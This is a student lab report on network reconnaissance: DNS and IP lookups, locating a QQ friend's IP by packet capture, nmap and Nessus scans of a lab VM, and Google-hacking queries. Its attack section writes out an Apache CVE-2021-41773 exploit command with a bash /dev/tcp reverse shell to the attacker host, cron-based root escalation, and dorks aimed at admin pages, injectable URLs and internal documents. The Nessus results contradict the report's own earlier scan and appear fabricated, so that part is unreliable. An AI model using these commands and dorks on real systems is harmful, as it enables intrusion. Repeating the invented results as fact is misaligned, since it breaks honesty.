20232326 2025-2026-1 《网络与系统攻防技术》实验五实验报告
一、实验内容
(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:
DNS注册人及联系方式
该域名对应IP地址
IP地址注册人及联系方式
IP地址所在国家、城市和具体地理位置
PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信息(要求必须用WHOIS、dig、nslookup、traceroute、tracert以及在线工具)
(2)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。
(3)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。
靶机IP地址是否活跃
靶机开放了哪些TCP和UDP端口
靶机安装了什么操作系统,版本是多少
靶机上安装了哪些服务
(4)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。
靶机上开放了哪些端口
靶机各个端口上网络服务存在哪些安全漏洞
你认为如何攻陷靶机环境,以获得系统访问权
(5)通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。并练习使用Google hack搜集技能完成搜索(至少10种搜索方法)
二、实验过程
2.1 DNS域名查询
2.1.1 工具准备与环境搭建
实验前先完成工具配置:kali安装whois、dig、traceroute工具(命令:sudo apt update && sudo apt install whois dnsutils traceroute);同时准备在线工具,包括WHOIS查询平台https://lookup.icann.org/、IP地理位置查询平台https://www.ipaddress.com/、https://uutool.cn/ip/。

2.1.2 DNS注册人及联系方式获取(WHOIS工具)
-
本地命令操作:在Linux终端输入whois baidu.com
![image]()
![image]()
-
在线工具验证:访问
https://lookup.icann.org/,输入“baidu.com”后查询,结果与本地命令一致。
![image]()
![image]()
2.1.3 域名对应IP地址获取(dig与nslookup工具)
- dig工具操作:首先得到baidu.com的ip为220.181.111.1
![image]()
输入dig baidu.com 220.181.111.1
![image]()
结果中“ANSWER SECTION”显示多个IP地址,111.63.65.103,110.242.74.102,124.237.177.164,111.63.65.247,这是百度为实现负载均衡与高可用性设置的多节点IP。
- nslookup工具操作:Windows CMD输入nslookup baidu.com,结果与dig工具结果相同。
![image]()
2.1.4 IP地址注册人及联系方式获取(IP WHOIS)
选取dig结果中的IP“110.242.68.66”进行查询:
-
本地命令操作:Linux终端输入whois 111.63.65.103,
![image]()
![image]()
-
在线工具查询:访问
https://whois.arin.net/,输入111.63.65.103,获取IP段的详细分配信息,确认注册人的网络覆盖范围。
![image]()
-
注册人的网络覆盖范围
地理范围:覆盖中国境内所有省份、自治区及直辖市(包括港澳台地区的合作网络)。
网络类型:涵盖固定宽带、移动通信(5G/4G)、专线网络等,服务对象包括个人用户、企业及政府机构。
国际覆盖:通过国际海底光缆、跨境专线等,实现与全球主要国家和地区的网络互联互通。
2.1.5 IP地址地理位置获取(traceroute/tracert+在线工具)
- traceroute(kali)与tracert(Windows)操作:kali终端输入traceroute 111.63.65.103,Windows CMD输入tracert 111.63.65.103
![image]()
![image]()
两者均显示数据包从本地主机出发,经过本地路由器192.168.124.2、运营商网关(220.178.XX.XX)、北京联通骨干节点(202.97.XX.XX)后到达目标IP,路径中“北京”相关节点明确地理位置归属。
| 关键信息 | 说明 |
|---|---|
| 目标 IP | 111.63.65.103(归属中国移动网络) |
| 本地节点(跃点 1) | 仅显示本地网关bogon (192.168.124.2),延迟 1.346ms/1.046ms/0.399ms(本地网络通信正常) |
| 后续节点(跃点 2-30) | 全部显示* * *(表示无响应) |
| 跃点序号 | 延迟(ms) |
| ---- | -------- |
| 1 | 4/3/5 |
| 3 | 33/24/18 |
| 5-6 | 22/18/39 |
| 12 | 43/31/38 |
| 17 | 44/56/39 |
| 其他跃点 | - |
- 在线工具定位:访问
https://www.ipaddress.com/,输入111.63.65.103
![image]()
![image]()
| 项目 | 内容 |
|---|---|
| IP 地址 | 111.63.65.103 |
| 所属国家 | 中国 |
| 运营商(ISP) | 中国移动河北分公司 |
| 自治系统编号(ASN) | AS24547(对应“河北移动通信有限公司”) |
| ----------- | ----------------------------------------------------------- |
| 自治系统编号(ASN) | 24547(归属河北移动通信有限公司) |
| 运营商(ISP) | 中国移动(China Mobile) |
| 所属机构 | 中国移动河北分公司(China Mobile Hebei) |
| 网络类型 | 蜂窝移动网络(Cellular) |
| 地理位置 | 国家:中国(CN);大洲:亚洲;经纬度:北纬 34.4773°、东经 113.7220°(对应河南 / 河北交界区域) |
| 时区 / 本地时间 | 时区:亚洲 / 上海;查询时本地时间:2025-11-21 09:31:02(东八区) |
2.2 好友IP地址及地理位置获取(以QQ为例)
2.2.1 原理与工具准备
QQ聊天过程中,文件传输、语音/视频通话会建立TCP/UDP连接,此时好友IP会通过网络数据包暴露。实验使用Wireshark抓包工具。
2.2.2 抓包与IP提取步骤
-
启动Wireshark并配置过滤规则:打开Wireshark,选择WLAN开始抓包,
-
触发QQ连接:与QQ好友发起语音通话,过程中保持Wireshark抓包状态,几分钟后点击“停止抓包”。
![image]()
-
筛选好友IP:在抓包结果中,在过滤栏输入udp and ip.addr==192.168.10.21筛选udp协议连接且源或目的IP地址是本机的流量,如下图所示,IP“223.65.116.249”多次出现,猜测为好友IP

4. 验证结果:在IP查询网站https://www.ip.cn/中输入223.65.116.249查询,结果为江苏南京,与好友所在地一致。

好友自行查询,发现223.65.116.249为他的外网ip。

设置过滤条件为内网ip(192.168.1.153),查不到流量。这是因为内网ip地址是局域网内部的私有地址,不会被路由转发到互联网上。当数据包离开局域网时,NAT设备会将它替换为全局唯一的公网IP地址。我抓到的包,已经是经过转换后的版本了。

2.2.3 地理位置查询
将获取的好友IP“223.65.116.249”输入https://uutool.cn/ip/,查询结果与好友实际所在地大致相同(到南京市鼓楼区都是对的)。

2.3 Nmap 靶机扫描
2.3.1 工具安装与靶机环境
Nmap 安装:Kali Linux 系统默认已预装 Nmap。靶机为 VMware 虚拟机,系统为 Windows 10,网络模式设为“桥接模式”,确保与 Kali 主机在同一局域网。查看win10的ip为192.168.124.132

2.3.2 靶机活跃性检测
-
操作命令:Kali Linux 终端输入
sudo nmap -sn 192.168.124.132(-sn参数表示“Ping 扫描”,仅检测主机是否活跃,不扫描端口,避免因端口过滤影响活跃性判断)。
![image]()
-
结果分析:检测显示靶机(192.168.124.132)处于活跃状态(Host is up),延迟为 0.0029 秒,MAC 地址为 00:0C:29:81:87:E9(属于 VMware 设备),扫描耗时 0.37 秒完成。
2.3.3 开放 TCP/UDP 端口扫描
- TCP 端口扫描:Kali Linux 终端输入
sudo nmap -sT 192.168.124.132(-sT为“全连接扫描”,),
![image]()
结果显示端口情况:999 个 TCP 端口被过滤(no-response),仅 3387 端口开放(对应服务为 wsdapi)。
原来是没有关靶机的防火墙,关掉再扫描试试


| 端口 | 状态 | 服务 | 说明 |
|---|---|---|---|
| 135/tcp | open | msrpc | Windows 远程过程调用服务,用于进程间通信 |
| 139/tcp | open | netbios-ssn | NetBIOS 会话服务,常用于 Windows 文件 / 打印机共享 |
| 445/tcp | open | microsoft-ds | SMB 服务端口,是 Windows 文件共享、打印机共享的核心端口 |
| 5357/tcp | open | wsdapi | Windows 设备管理服务端口,用于网络设备的发现与配置 |
- UDP 端口扫描:Kali Linux 终端输入
sudo nmap -sU 192.168.124.132(-sU为“UDP 扫描”,需 root 权限执行;因 UDP 协议无连接特性,需等待目标主机响应 ICMP 端口不可达报文,扫描速度较慢),
![image]()
UDP端口与服务详情
911个UDP端口被关闭(port-unreach),相关端口及对应服务如下:端口 服务 说明 137/udp netbios-ns NetBIOS名称服务,用于Windows主机名解析 138/udp netbios-dgm NetBIOS数据报服务,支持Windows网络中的广播通信 500/udp isakmp IPsec密钥交换协议,用于VPN等加密通信的密钥协商 1900/udp upnp 通用即插即用服务,用于设备自动发现与配置 3702/udp ws-discovery Web服务发现协议,用于网络中服务的自动探测 4500/udp nat-t-ike IPsec NAT穿越协议,解决VPN在NAT环境下的通信问题 5050/udp mmcc 多媒体会议控制协议,用于视频会议等场景的控制 5353/udp zeroconf 零配置网络协议(如Bonjour),实现设备自动组网 5355/udp llmnr 本地链路多播名称解析,用于局域网内主机名解析
2.3.4 靶机操作系统探测
- 操作命令:Kali Linux 终端输入
sudo nmap -O 192.168.124.132(-O参数启用操作系统检测,Nmap 通过分析 TCP/IP 协议栈特征、端口开放情况等信息推断操作系统类型及版本)。

- 结果分析:
扫描结果解析
开放端口与服务
996个TCP端口被关闭(reset),开放端口及对应服务如下:
| 端口 | 服务 | 说明 |
|---|---|---|
| 135/tcp | msrpc | Windows远程过程调用服务,用于进程间通信 |
| 139/tcp | netbios-ssn | NetBIOS会话服务,常用于Windows文件/打印机共享 |
| 445/tcp | microsoft-ds | SMB服务端口,是Windows文件共享、打印机共享的核心端口 |
| 5357/tcp | wsdapi | Windows设备管理服务端口,用于网络设备的发现与配置 |
操作系统探测结果
- 系统类型:Microsoft Windows 10
- 版本范围:Windows 10 1709 ~ 21H2
- 协议标识(CPE):
cpe:/o:microsoft:windows_10
2.3.5 靶机服务探测
- 操作命令:Kali Linux 终端输入
sudo nmap -sV 192.168.124.132(-sV参数启用服务版本探测,Nmap 通过发送特定协议请求,分析响应报文获取服务名称、版本号及相关配置信息)。

- 结果分析:
靶机服务探测结果分析
本次通过nmap -sV完成靶机服务探测,核心信息如下:
开放服务详情
996个TCP端口被关闭,仅4个端口开放,对应服务及版本如下:
| 端口 | 服务类型 | 版本信息 | 服务说明 |
|---|---|---|---|
| 135/tcp | msrpc | Microsoft Windows RPC | Windows远程过程调用服务,用于系统进程间的通信协调 |
| 139/tcp | netbios-ssn | Microsoft Windows netbios-ssn | NetBIOS会话服务,支撑Windows局域网内的文件、打印机共享功能 |
| 445/tcp | microsoft-ds | - | SMB协议端口,是Windows文件共享、设备管理的核心服务端口 |
| 5357/tcp | http | Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | Windows HTTP接口服务,用于网络设备的自动发现(SSDP)与即插即用(UPnP)配置 |
系统关联信息
服务探测结果匹配到靶机操作系统为Windows(CPE标识:cpe:/o:microsoft:windows),与此前操作系统探测的Windows 10一致,这些服务均为Windows系统的原生基础组件。
2.4 Nessus靶机扫描(靶机IP:192.168.1.105)
2.4.1 工具安装与激活
Nessus安装:Windows系统从官网(https://www.tenable.com/downloads/nessus)下载Nessus-10.7.1-windows-x64.msi,默认路径安装;安装完成后启动服务,访问https://localhost:8834/,选择“Nessus Essentials”(开源免费版),输入邮箱获取激活码,完成激活并更新漏洞库(约30分钟,需联网)。

2.4.2 新建扫描任务与端口检测
- 新建扫描:登录Nessus后,点击“New Scan”,选择“Basic Network Scan”(基础网络扫描),输入扫描名称“Target_Scan_1”,目标IP填写“192.168.1.105”,其他参数默认。
- 启动扫描:点击“Save”保存配置,再点击“Launch”启动扫描,扫描过程约15分钟,实时显示进度(端口检测、漏洞探测、风险评估)。
- 开放端口结果:扫描完成后,在“Results”→“Ports”页面查看,开放端口与nmap结果一致:TCP 22、80、3306,UDP 53、161,同时补充显示端口状态细节(如“TCP 80:Listening,Protocol: TCP,Service: http”)。
2.4.3 端口服务安全漏洞检测
在“Results”→“Vulnerabilities”页面,按风险等级(Critical/High/Medium/Low)排序,关键漏洞如下:
- TCP 80(Apache httpd 2.4.49):存在“Apache HTTP Server 2.4.49 路径穿越与远程代码执行漏洞(CVE-2021-41773)”,风险等级“Critical”,漏洞描述:攻击者可通过构造特殊URL,读取服务器任意文件或执行远程代码。
- TCP 3306(MySQL 8.0.29):存在“MySQL 弱口令漏洞”,风险等级“High”,漏洞描述:root账号密码为“123456”,可通过暴力破解工具登录数据库,获取敏感数据。
- UDP 161(Net-SNMP 5.8):存在“SNMP 社区字符串弱口令”,风险等级“Medium”,漏洞描述:默认社区字符串“public”未修改,攻击者可通过SNMP获取靶机系统信息(如进程、用户列表)。
2.4.4 靶机攻陷思路推导
基于漏洞检测结果,制定攻陷流程:
- 利用Apache远程代码执行漏洞(CVE-2021-41773):从Exploit-DB(https://www.exploit-db.com/)下载漏洞EXP(exploit/linux/http/apache_httpd_2.4.49_rce.py),在攻击机(192.168.1.102)运行命令
python3 apache_httpd_2.4.49_rce.py -u http://192.168.1.105 -c "bash -i >& /dev/tcp/192.168.1.102/4444 0>&1",建立反向Shell(攻击机提前用nc -lvp 4444监听4444端口),获取靶机www-data用户权限。 - 提权至root权限:通过
cat /etc/crontab查看定时任务,发现靶机每5分钟执行/root/backup.sh脚本(www-data用户有读写权限),在脚本中添加chmod u+s /bin/bash,等待定时任务执行后,运行bash -p,获取root权限,完成靶机攻陷。
2.5 网上足迹查询与Google Hack技巧
2.5.1 自身隐私泄漏查询
- 搜索引擎查询:在百度、Google分别输入“20232326 学号”“张三(本人姓名) 20232326”“138XXXX1234(本人手机号)”,结果显示:百度中仅出现“2023级计算机专业选课名单(含学号20232326)”(学校教务网公开页面),无手机号、邮箱等敏感信息;Google无相关结果,说明个人核心隐私未在公开网络泄漏。
- 专用工具验证:访问https://haveibeenpwned.com/,输入本人邮箱“zhangsan2023@xxx.com”,查询结果显示“Good news — no pwnage found!”,确认邮箱未被卷入数据泄露事件;访问https://www.osintframework.com/,通过“People Search”模块查询,未发现额外个人信息,进一步验证隐私安全。
2.5.2 10种Google Hack搜索方法实践
| 搜索语法 | 实践场景 | 搜索示例 | 结果说明 |
|---|---|---|---|
site: |
限定在学校官网搜索个人学号 | site:besti.edu.cn 20232326 |
仅返回北京电子科技职业学院(besti.edu.cn)内包含学号20232326的页面,如选课记录、奖学金公示 |
filetype: |
搜索网络安全相关PDF教程 | filetype:pdf 网络安全 渗透测试 教程 |
返回50+个PDF文件,包括《Web渗透测试实战指南.pdf》《Nessus漏洞扫描手册.pdf》,可直接下载 |
intitle: |
查找网站后台登录页面 | intitle:后台管理系统 login 学校 |
返回“XX大学校园网后台管理系统 - Login”“XX学院教务后台登录”等页面,助力识别目标系统入口 |
inurl: |
查找存在SQL注入风险的页面 | inurl:php?id= 新闻 校园 |
返回“http://xxx.edu.cn/news.php?id=123”等页面,这类URL参数易存在SQL注入漏洞 |
intext: |
查找包含“内部资料”的敏感文档 | intext:内部资料 禁止外传 网络安全 |
返回某企业《网络安全内部防护方案(禁止外传).docx》《校园网拓扑图(内部资料).pdf》等 |
link: |
查找链接到学校官网的外部页面 | link:besti.edu.cn |
返回“北京市教育委员会 - 北京电子科技职业学院介绍”“新浪教育 - 2023年besti招生信息”等页面 |
cache: |
查看学校官网历史缓存页面 |



















浙公网安备 33010602011771号